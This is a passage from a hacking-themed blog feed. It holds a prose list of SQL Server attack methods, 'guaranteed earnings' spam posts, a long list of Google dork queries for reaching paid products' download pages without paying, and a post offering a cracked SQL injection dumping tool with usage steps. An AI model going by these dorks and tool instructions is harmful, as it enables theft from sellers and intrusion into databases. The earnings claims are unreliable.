Direct attacks using tools such as Metasploit, shown in Figure 2, and its commercial equivalents (CANVAS and CORE IMPACT) are used to exploit certain vulnerabilities found during normal vulnerability scanning. This is typically the silver-bullet hack for attackers penetrating a system and performing code injection or gaining unauthorized command-line access.&lt;br /&gt;
&lt;a href="http://tk.files.storage.msn.com/x1pCFuELfk4HG5HGNGsDSLDPGwHBJTb0vp0sXjpOrOZrnH6nMP2G0SNPVQ4Y-rLvRXqUmjEXP1IzpJmFF1E77NsFhuHZFjUzCxCo6xPpAM6Qa3C3-Up5TNdn8NpdoxJZm5u9SqpHqmLyIU" target="_blank"&gt;&lt;img alt="" border="0" src="http://tk.files.storage.msn.com/x1pCFuELfk4HG5HGNGsDSLDPGwHBJTb0vp0sXjpOrOZrnH6nMP2G0SNPVQ4Y-rLvRXqUmjEXP1IzpJmFF1E77NsFhuHZFjUzCxCo6xPpAM6Qa3C3-Up5TNdn8NpdoxJZm5u9SqpHqmLyIU" /&gt;&lt;/a&gt;&lt;br /&gt;
Figure 2: SQL Server vulnerability exploitable using Metasploit?s  MSFConsole.&lt;/div&gt;&lt;div class="msg" id="post_message_49528" style="color: white;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="msg" id="post_message_49528" style="color: white;"&gt;&lt;/div&gt;&lt;div class="msg" id="post_message_49528" style="color: white;"&gt;&lt;b&gt;6. SQL injection&lt;/b&gt;&lt;br /&gt;
SQL injection attacks are executed via front-end Web applications that don?t properly validate user input. Malformed SQL queries, including SQL commands, can be inserted directly into Web URLs and return informativeprefer to perform the follow-through using an automated tool, such as SPI Dynamics? SQL Injector, shown in Figure 3.&lt;br /&gt;
&lt;a href="http://tk.files.storage.msn.com/x1pCFuELfk4HG5HGNGsDSLDPKB85nrgDPBZgZMzpdS4LYDPlYY7ipEXc5tc_g81kn8mmksZeBbk9NCCohx3sWeSBAZIs0REpIUFqwgOVzeTDwq0JdaKV_ldDqJDnXdk_NBgH7UIhhw_QEk" target="_blank"&gt;&lt;img alt="" border="0" src="http://tk.files.storage.msn.com/x1pCFuELfk4HG5HGNGsDSLDPKB85nrgDPBZgZMzpdS4LYDPlYY7ipEXc5tc_g81kn8mmksZeBbk9NCCohx3sWeSBAZIs0REpIUFqwgOVzeTDwq0JdaKV_ldDqJDnXdk_NBgH7UIhhw_QEk" /&gt;&lt;/a&gt;&lt;br /&gt;
Figure 3: SPI Dynamics? SQL Injector tool automates the SQL injection process. errors, commands being executed and more. These attacks can be carried out manually ? if you have a lot of time. Once I discover that a server has a potential SQL injection vulnerability, I&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;7. Blind SQL injection&lt;/b&gt;&lt;br /&gt;
These attacks go about exploiting Web applications and back-end SQL Servers in the same basic fashion as standard SQL injection. The big difference is that the attacker doesn?t receive feedback from the Web server in the form of returned error messages. Such an attack is even slower than standard SQL injection given the guesswork involved. You need a good tool for this situation, and that?s where Absinthe, shown in Figure 4, comes in handy.&lt;br /&gt;
&lt;a href="http://tk.files.storage.msn.com/x1pCFuELfk4HG5HGNGsDSLDPFOs_13CAeDL85BfAUQPDED10kx1dXmFdlTmyK-RbdrqfNqYWfqiYbcsgjT0hEDVQhWO6-K-jtbolzY-3K_VYu5PbS3FInnp-RAs9vZ-MOiG7E-NnBR48FY" target="_blank"&gt;&lt;img alt="" border="0" src="http://tk.files.storage.msn.com/x1pCFuELfk4HG5HGNGsDSLDPFOs_13CAeDL85BfAUQPDED10kx1dXmFdlTmyK-RbdrqfNqYWfqiYbcsgjT0hEDVQhWO6-K-jtbolzY-3K_VYu5PbS3FInnp-RAs9vZ-MOiG7E-NnBR48FY" /&gt;&lt;/a&gt;&lt;br /&gt;
Figure 4: Absinthe tool takes the pain out of blind SQL injection  testing.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;8. Reverse engineering the system&lt;/b&gt;&lt;br /&gt;
The reverse engineering trick looks for software exploits, memory corruption weaknesses and so on. In this sample chapter from the excellent book Exploiting Software: How to Break Code by Greg Hoglund and Gary McGraw, you?ll find a discussion about reverse engineering ploys.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;9. Google hacks&lt;/b&gt;&lt;br /&gt;
Google hacks use the extraordinary power of the Google search engine to ferret out SQL Server errors ? such as ?Incorrect syntax near? ? leaking from publicly accessible systems. Several Google queries are available at Johnny Long?s Google Hacking Database. (Look in the sections titled Error Messages and Files containing passwords.) Hackers use Google to find passwords, vulnerabilities in Web Servers, underlying operating systems, publicly available procedures and more that they can use to further compromise a SQL Server system. Combining these queries with Web site names via Google?s ?site:? operator often turns up juicy info you never imagined you could unearth.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;10. Perusing Web site source code&lt;/b&gt;&lt;br /&gt;
Source Code can also turn up information that may lead to a SQL Server break in. Specifically, developers may store SQL Server authentication information in ASP scripts to simplify the authentication process. A manual assessment or Google could uncover this information in a split second   &lt;/div&gt;&lt;div id="ui-datepicker-div" style="display: none;"&gt;&lt;/div&gt;</content><link href="http://i-xploit.blogspot.com/feeds/8263202014932625501/comments/default" rel="replies" title="Post Comments" type="application/atom+xml"/><link href="http://i-xploit.blogspot.com/2010/04/10-tricks-to-xploit-sql-sites.html#comment-form" rel="replies" title="0 Comments" type="text/html"/><link href="http://www.blogger.com/feeds/4293538220121388026/posts/default/8263202014932625501" rel="edit" type="application/atom+xml"/><link href="http://www.blogger.com/feeds/4293538220121388026/posts/default/8263202014932625501" rel="self" type="application/atom+xml"/><link href="http://i-xploit.blogspot.com/2010/04/10-tricks-to-xploit-sql-sites.html" rel="alternate" title="10 Tricks to Xploit SQL Sites" type="text/html"/><author><name>Unknown</name><email>noreply@blogger.com</email><gd:image height="16" rel="http://schemas.google.com/g/2005#thumbnail" src="https://img1.blogblog.com/img/b16-rounded.gif" width="16"/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="http://i48.tinypic.com/sxkr5i_th.jpg" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4293538220121388026.post-1262774658677932125</id><published>2010-03-24T16:35:00.001+05:30</published><updated>2010-03-24T16:39:37.567+05:30</updated><category scheme="http://www.blogger.com/atom/ns#" term="Earn"/><title type="text">Earn $45 per month. Guaranteed.</title><content type="html">&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg0AoUXFhoI2p5Fl4p4qACN226NKLkI2iGEolDrgaJmEdtMZpIVgOTmaAE6MBb5VVGQ2Ca68awFM_ieC6gnmkk1fw3ZfaLheXKw9jednupFclwUkO2OcgYeOpcfmnWsF0vyH5S_6lokmh_V/s1600/7.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg0AoUXFhoI2p5Fl4p4qACN226NKLkI2iGEolDrgaJmEdtMZpIVgOTmaAE6MBb5VVGQ2Ca68awFM_ieC6gnmkk1fw3ZfaLheXKw9jednupFclwUkO2OcgYeOpcfmnWsF0vyH5S_6lokmh_V/s320/7.jpeg" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;a href="http://www.scribd.com/doc/28848420/EARN-45-PER-MONTH-GUARANTEED" style="display: block; font-family: Helvetica,Arial,Sans-serif; font-size-adjust: none; font-size: 14px; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin: 12px auto 6px; text-decoration: underline;" title="View EARN $45 PER MONTH. GUARANTEED.  on Scribd"&gt;EARN $45 PER MONTH. GUARANTEED. &lt;/a&gt; &lt;object data="http://d1.scribdassets.com/ScribdViewer.swf" height="600" id="doc_230184037977001" name="doc_230184037977001" style="outline-color: -moz-use-text-color; outline-style: none; outline-width: medium;" type="application/x-shockwave-flash" width="100%"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;param name="movie" value="http://d1.scribdassets.com/ScribdViewer.swf"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;param name="wmode" value="opaque"&gt; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;param name="bgcolor" value="#ffffff"&gt; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;param name="allowFullScreen" value="true"&gt; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;param name="allowScriptAccess" value="always"&gt; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;param name="FlashVars" value="document_id=28848420&amp;amp;access_key=key-ywyqqw2b6mybe21q1cb&amp;amp;page=1&amp;amp;viewMode=list"&gt; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;embed id="doc_230184037977001" name="doc_230184037977001" src="http://d1.scribdassets.com/ScribdViewer.swf?document_id=28848420&amp;amp;access_key=key-ywyqqw2b6mybe21q1cb&amp;amp;page=1&amp;amp;viewMode=list" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" height="600" width="100%" wmode="opaque" bgcolor="#ffffff"&gt;&lt;/embed&gt; &amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/object&gt;</content><link href="http://i-xploit.blogspot.com/feeds/1262774658677932125/comments/default" rel="replies" title="Post Comments" type="application/atom+xml"/><link href="http://i-xploit.blogspot.com/2010/03/earn-45-per-month-guaranteed-see-my.html#comment-form" rel="replies" title="0 Comments" type="text/html"/><link href="http://www.blogger.com/feeds/4293538220121388026/posts/default/1262774658677932125" rel="edit" type="application/atom+xml"/><link href="http://www.blogger.com/feeds/4293538220121388026/posts/default/1262774658677932125" rel="self" type="application/atom+xml"/><link href="http://i-xploit.blogspot.com/2010/03/earn-45-per-month-guaranteed-see-my.html" rel="alternate" title="Earn $45 per month. Guaranteed." type="text/html"/><author><name>Unknown</name><email>noreply@blogger.com</email><gd:image height="16" rel="http://schemas.google.com/g/2005#thumbnail" src="https://img1.blogblog.com/img/b16-rounded.gif" width="16"/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg0AoUXFhoI2p5Fl4p4qACN226NKLkI2iGEolDrgaJmEdtMZpIVgOTmaAE6MBb5VVGQ2Ca68awFM_ieC6gnmkk1fw3ZfaLheXKw9jednupFclwUkO2OcgYeOpcfmnWsF0vyH5S_6lokmh_V/s72-c/7.jpeg" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4293538220121388026.post-8196532701279251902</id><published>2010-03-05T19:49:00.000+05:30</published><updated>2010-03-05T20:26:54.337+05:30</updated><category scheme="http://www.blogger.com/atom/ns#" term="Tricks"/><title type="text">Get Paid Stuffs For Free Using Black Hat SEO Technique.</title><content type="html">&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://www.masteringplastering.com/Free.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://www.masteringplastering.com/Free.png" /&gt;&lt;/a&gt;&lt;/div&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;I am going to show you how you can download almost anything for FREE. This technique does not include torrents or Lime Wire or anything like that, it includes black hat SEO technique on Google. You may think to yourself there is no way that Google can be hacked but you would be very wrong. There is a way to hack Google and download almost anything.&lt;br /&gt;
&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
There are a few different ways to accomplish this but they are all very similar.&lt;br /&gt;
&lt;br /&gt;
&lt;strong&gt;Google Hack Technique 1&lt;/strong&gt;&lt;br /&gt;
&lt;br /&gt;
Go to your favorite search engine, aka Google and type this in;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: red;"&gt;“Clickbank/keynetics will appear” + keyword&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
All you have to do is replace “keyword” with what you are looking for. Let’s say you are looking for SEO Elite, you would type;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: red;"&gt;“Clickbank/keynetics will appear” + seoelite&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
Google will give you a bunch of the results, you just have to go through some of them until you find what you are looking for; pretty simple isn’t it. Let’s move on.&lt;br /&gt;
&lt;br /&gt;
&lt;strong&gt;Google Hack Technique 2&lt;/strong&gt;&lt;br /&gt;
&lt;br /&gt;
Again go to Google and type this in;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: red;"&gt;“http://thank-you-for-your-purchase-cbreceipt.blogspot.com”&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
As you can see what we are essentially doing is looking for that “Thank You” page. Every seller has a thank you page and if we can get to that page it is very likely that it will contain the download link.&lt;br /&gt;
&lt;br /&gt;
&lt;strong&gt;Google Hack Technique 3&lt;/strong&gt;&lt;br /&gt;
&lt;br /&gt;
Same as in the first 2 steps we are looking for the statement that is likely to be on the thank you page. Type this into Google and you will be able to download items found on Click Bank site;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: red;"&gt;“Your credit card or bank statement will show a charge by ClickBank.”&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
However if you are still not satisfied and are not in the mood to hack Google you can simply download THIS FILE that will give you locations of more than 1300 downloads to various software’s and e-books.  It might take you a lot of time to go through it all, I honestly haven’t even tried, but it will pay off in the end, you will find what you are looking for.&lt;br /&gt;
&lt;br /&gt;
&lt;strong&gt;Conclusion&lt;/strong&gt;&lt;br /&gt;
&lt;br /&gt;
As you can see there are some “keywords” that you will need to use when hacking Google such as “thank you for your purchase” or ”your bank statement will show a charge” etc., be creative and the sky will be the limit. To help you out with the creativity part I have included some common keywords used when hacking Google. Good luck hunting.&lt;br /&gt;
&lt;br /&gt;
&lt;strong&gt;KEYWORDS:&lt;/strong&gt;&lt;br /&gt;
&lt;span style="color: red;"&gt;Order Confirmation&lt;br /&gt;
Order Confirmed&lt;br /&gt;
wso………. short for “Warrior Special Offer”&lt;br /&gt;
wso plr&lt;br /&gt;
wso thanks&lt;br /&gt;
wso thank you&lt;br /&gt;
wso ty&lt;br /&gt;
wso download&lt;br /&gt;
“a charge from clickbank”&lt;br /&gt;
inurl:cbreceipt&lt;br /&gt;
inurl:cbreceipt=&lt;br /&gt;
cbreceipt=&lt;br /&gt;
cbreceipt&lt;br /&gt;
cbreceipt click&lt;br /&gt;
Thank you for your order&lt;br /&gt;
Thank you for your purchase&lt;br /&gt;
Thanks for your order&lt;br /&gt;
Thanks for your purchase&lt;br /&gt;
Thanks for purchasing… [name of the ebook]&lt;br /&gt;
plr thank ty&lt;br /&gt;
Your credit card or bank statement will show a charge from CLKBANK*com&lt;br /&gt;
A charge from CLKBANK&lt;br /&gt;
A Charge from paypal&lt;br /&gt;
Paypal payment or paypal payment confirmed&lt;br /&gt;
Paypal Statement&lt;br /&gt;
CLKBANK “save as”&lt;br /&gt;
CLKBANK Download instructions&lt;br /&gt;
CLKBANK*com&lt;br /&gt;
CLKBANK “right click”&lt;br /&gt;
CLKBANK click&lt;br /&gt;
Download the latest version of adobe acrobat reader&lt;br /&gt;
“right click” “save target as”&lt;br /&gt;
“right click” save&lt;br /&gt;
“right click” “save file as”&lt;br /&gt;
Click here to download&lt;br /&gt;
“Save target as”&lt;br /&gt;
“Save file as”&lt;br /&gt;
receive future updates&lt;br /&gt;
username is password is&lt;br /&gt;
username: password:&lt;br /&gt;
Members&lt;br /&gt;
Members area&lt;br /&gt;
thank you for your order +download&lt;br /&gt;
Congratulations on your investment.&lt;br /&gt;
Your credit card statement will show a charge&lt;br /&gt;
priv.htm&lt;br /&gt;
priv (no .htm, this will display any files under the folder named priv)&lt;br /&gt;
members&lt;br /&gt;
Your credit card or bank statement will show a charge from CLKBANK.com&lt;br /&gt;
A charge from CLKBANK&lt;br /&gt;
A Charge from paypal&lt;br /&gt;
Paypal payment or paypal payment confirmed&lt;br /&gt;
Paypal Statement&lt;br /&gt;
CLKBANK save as&lt;br /&gt;
CLKBANK Download instructions&lt;br /&gt;
CLKBANK*com&lt;br /&gt;
cbreceipt or cbreceipt click&lt;br /&gt;
CLKBANK right click or CLKBANK click&lt;br /&gt;
Download the latest version of adobe acrobat reader&lt;br /&gt;
right click save target as&lt;br /&gt;
right click save&lt;br /&gt;
right click save file as&lt;br /&gt;
Click here to download&lt;br /&gt;
Save target as&lt;br /&gt;
Save file as&lt;br /&gt;
recieve future updates&lt;br /&gt;
username is password is&lt;br /&gt;
username: password:&lt;br /&gt;
Members or Members area&lt;br /&gt;
Thank you for your order&lt;br /&gt;
Thank you for your purchase&lt;br /&gt;
Thanks for your order&lt;br /&gt;
Thanks for your purchase&lt;br /&gt;
Thanks for purchasing……&lt;br /&gt;
Order Confirmation&lt;br /&gt;
Order Confirmed&lt;br /&gt;
wso…………….short for “Warrior Special Offer”&lt;br /&gt;
wso plr&lt;br /&gt;
wso thanks&lt;br /&gt;
wso thank you&lt;br /&gt;
wso ty&lt;br /&gt;
wso download&lt;br /&gt;
plr thank&lt;br /&gt;
…and then add the product name on the end of it.&lt;br /&gt;
private&lt;br /&gt;
ebook.htm&lt;br /&gt;
yourebook.htm&lt;br /&gt;
myebook.htm&lt;br /&gt;
ebook.pdf&lt;br /&gt;
yourebook.pdf&lt;br /&gt;
myebook.pdf&lt;br /&gt;
nameofebook.pdf (replace nameofebook.pdf with actual name)&lt;br /&gt;
index.of title_of_ebook.pdf&lt;br /&gt;
shortversionofebook.pdf (if there’s an acronym for the ebook)&lt;br /&gt;
promember.htm&lt;br /&gt;
thankyou1.htm&lt;br /&gt;
secrets.htm&lt;br /&gt;
thankyou.htm&lt;br /&gt;
thank-you.htm&lt;br /&gt;
thank_you.htm&lt;br /&gt;
download.htm&lt;br /&gt;
downloadlink.htm&lt;br /&gt;
downloadpage.htm&lt;br /&gt;
members.htm&lt;br /&gt;
private.htm&lt;br /&gt;
hidden.htm&lt;br /&gt;
downlink.htm&lt;br /&gt;
down-link.htm&lt;br /&gt;
down_link.htm&lt;br /&gt;
download.htm&lt;br /&gt;
downloadpage.htm&lt;br /&gt;
download-page.htm&lt;br /&gt;
download_page.htm&lt;br /&gt;
verified.htm&lt;br /&gt;
paidmember.htm&lt;br /&gt;
paid-member.htm&lt;br /&gt;
paid_member.htm&lt;br /&gt;
verifiedmember.htm&lt;br /&gt;
verified-member.htm&lt;br /&gt;
verified_member.htm&lt;br /&gt;
alert.htm&lt;br /&gt;
alert&lt;br /&gt;
resources&lt;br /&gt;
resources.htm&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
Please leave your comments if u have any queries !!!</content><link href="http://i-xploit.blogspot.com/feeds/8196532701279251902/comments/default" rel="replies" title="Post Comments" type="application/atom+xml"/><link href="http://i-xploit.blogspot.com/2010/03/get-paid-stuffs-for-free-using-black.html#comment-form" rel="replies" title="1 Comments" type="text/html"/><link href="http://www.blogger.com/feeds/4293538220121388026/posts/default/8196532701279251902" rel="edit" type="application/atom+xml"/><link href="http://www.blogger.com/feeds/4293538220121388026/posts/default/8196532701279251902" rel="self" type="application/atom+xml"/><link href="http://i-xploit.blogspot.com/2010/03/get-paid-stuffs-for-free-using-black.html" rel="alternate" title="Get Paid Stuffs For Free Using Black Hat SEO Technique." type="text/html"/><author><name>Unknown</name><email>noreply@blogger.com</email><gd:image height="16" rel="http://schemas.google.com/g/2005#thumbnail" src="https://img1.blogblog.com/img/b16-rounded.gif" width="16"/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4293538220121388026.post-3067411508952649942</id><published>2010-03-02T17:18:00.003+05:30</published><updated>2010-03-02T17:22:32.373+05:30</updated><category scheme="http://www.blogger.com/atom/ns#" term="Earn"/><title type="text">Earn more than $765 per month!!!</title><content type="html">&lt;div align="left" class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://news-libraries.mit.edu/blog/wp-content/uploads/2008/01/money.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="200" src="http://news-libraries.mit.edu/blog/wp-content/uploads/2008/01/money.jpg" width="200" /&gt;&lt;/a&gt;&amp;nbsp;&lt;/div&gt;&lt;div align="left" class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://www.scribd.com/doc/27707111/Earn-More-Than-765-Per-Month" style="-x-system-font: none; display: block; font-family: Helvetica,Arial,Sans-serif; font-size-adjust: none; font-size: 14px; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin: 12px auto 6px auto; text-decoration: underline;" title="View Earn More Than $765 Per Month on Scribd"&gt;Earn More Than $765 Per Month&lt;/a&gt; &lt;object data="http://d1.scribdassets.com/ScribdViewer.swf" height="500" id="doc_392414302352348" name="doc_392414302352348" style="outline: none;" type="application/x-shockwave-flash" width="100%"&gt;        &lt;param name="movie" value="http://d1.scribdassets.com/ScribdViewer.swf"&gt;        &lt;param name="wmode" value="opaque"&gt;         &lt;param name="bgcolor" value="#ffffff"&gt;         &lt;param name="allowFullScreen" value="true"&gt;         &lt;param name="allowScriptAccess" value="always"&gt;         &lt;param name="FlashVars" value="document_id=27707111&amp;amp;access_key=key-1scufnhpg124lqu22u3t&amp;amp;page=1&amp;amp;viewMode=list"&gt;         &lt;embed id="doc_392414302352348" name="doc_392414302352348" src="http://d1.scribdassets.com/ScribdViewer.swf?document_id=27707111&amp;amp;access_key=key-1scufnhpg124lqu22u3t&amp;amp;page=1&amp;amp;viewMode=list" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" height="500" width="100%" wmode="opaque" bgcolor="#ffffff"&gt;&lt;/embed&gt;     &lt;/object&gt; &amp;nbsp; &amp;nbsp;&amp;nbsp;&lt;/div&gt;</content><link href="http://i-xploit.blogspot.com/feeds/3067411508952649942/comments/default" rel="replies" title="Post Comments" type="application/atom+xml"/><link href="http://i-xploit.blogspot.com/2010/03/earn-more-than-765-per-month.html#comment-form" rel="replies" title="0 Comments" type="text/html"/><link href="http://www.blogger.com/feeds/4293538220121388026/posts/default/3067411508952649942" rel="edit" type="application/atom+xml"/><link href="http://www.blogger.com/feeds/4293538220121388026/posts/default/3067411508952649942" rel="self" type="application/atom+xml"/><link href="http://i-xploit.blogspot.com/2010/03/earn-more-than-765-per-month.html" rel="alternate" title="Earn more than $765 per month!!!" type="text/html"/><author><name>Unknown</name><email>noreply@blogger.com</email><gd:image height="16" rel="http://schemas.google.com/g/2005#thumbnail" src="https://img1.blogblog.com/img/b16-rounded.gif" width="16"/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4293538220121388026.post-1260730140322842717</id><published>2010-02-27T19:53:00.001+05:30</published><updated>2010-02-27T19:55:59.005+05:30</updated><category scheme="http://www.blogger.com/atom/ns#" term="Tools"/><title type="text">My SOLiDumper worth $50 cracked!!!</title><content type="html">&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgYpFaEksx9aJ25afI8cTJp78CMBjIkywX7j0Sa9etb9GCZAqGgLWpWEklvknulz5LWgqvEt7tNWdgtvnoV9XvUmcATuNgEMYNQAOUm0_JS7hmCHXct8u5oT_htXCPXW385J2ucOVhW9OOG/s1600/1.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="266" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgYpFaEksx9aJ25afI8cTJp78CMBjIkywX7j0Sa9etb9GCZAqGgLWpWEklvknulz5LWgqvEt7tNWdgtvnoV9XvUmcATuNgEMYNQAOUm0_JS7hmCHXct8u5oT_htXCPXW385J2ucOVhW9OOG/s400/1.JPG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Requirements:&lt;/b&gt;&lt;br /&gt;
.Net Framework 3.5&lt;br /&gt;
DOWNLOAD FROM HERE:&lt;br /&gt;
&lt;a class="normal12blue" href="http://www.ziddu.com/download/8760628/MySQLiDumper.rar.html"&gt;http://www.ziddu.com/download/8760628/MySQLiDumper.rar.html&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Screen shots:&lt;/b&gt;&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;b&gt;&lt;/b&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjSI3ABOMHwQGEIq4NflA-D8I1mGiQjBUjziIxz2iK_2457BqsxtOpwk42qBewxznWpVKYWGCPGDXXj8Sj1LqeO-Wxq_i5zw8lN0l76EVgZW6NC6DVaJOxa4kzxhnF4AWDlTT0Fq6z1Rkkt/s1600/2.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="268" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjSI3ABOMHwQGEIq4NflA-D8I1mGiQjBUjziIxz2iK_2457BqsxtOpwk42qBewxznWpVKYWGCPGDXXj8Sj1LqeO-Wxq_i5zw8lN0l76EVgZW6NC6DVaJOxa4kzxhnF4AWDlTT0Fq6z1Rkkt/s400/2.JPG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;div style="text-align: center;"&gt;Enter the vulnerable url in Num Blind and click on get page&lt;b&gt;. &lt;/b&gt;Copy the union section and paste in Dump MySQL. Click Get Info for Database, Tables and Columns&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;/div&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgY2AMVL1f7v_91y9qJhUJP3NnDYSOF5cnnCDkB5oTBVxV97LOhWvsvG0WSPml-yjaDckbm94k2SJnu9NvYiJoH4FbHMZZ7SVIv7d_Sc3MqLciLsgLNcKL9FPU3adMXP94div6UMA4FAx7k/s1600/3.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="267" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgY2AMVL1f7v_91y9qJhUJP3NnDYSOF5cnnCDkB5oTBVxV97LOhWvsvG0WSPml-yjaDckbm94k2SJnu9NvYiJoH4FbHMZZ7SVIv7d_Sc3MqLciLsgLNcKL9FPU3adMXP94div6UMA4FAx7k/s400/3.JPG" width="400" /&gt;&lt;/a&gt;&amp;nbsp;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;Dump Brute: Used for Brute force attack&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&amp;nbsp;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjUE2gawWIr0BUTGHBlm6Y-RfWQDU2GtGuxax7fAZulwp14bFTpOC-dECRQ9us1tBuwkhWT4ONFnL_kRixCAX6jatjuHn_WVV0B5GcaS4m5lZ3SjzFDmBzuw-mg3CpknL8VnVjNwL8SZ_Kw/s1600/4.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="268" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjUE2gawWIr0BUTGHBlm6Y-RfWQDU2GtGuxax7fAZulwp14bFTpOC-dECRQ9us1tBuwkhWT4ONFnL_kRixCAX6jatjuHn_WVV0B5GcaS4m5lZ3SjzFDmBzuw-mg3CpknL8VnVjNwL8SZ_Kw/s400/4.JPG" width="400" /&gt;&lt;/a&gt;&amp;nbsp;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;
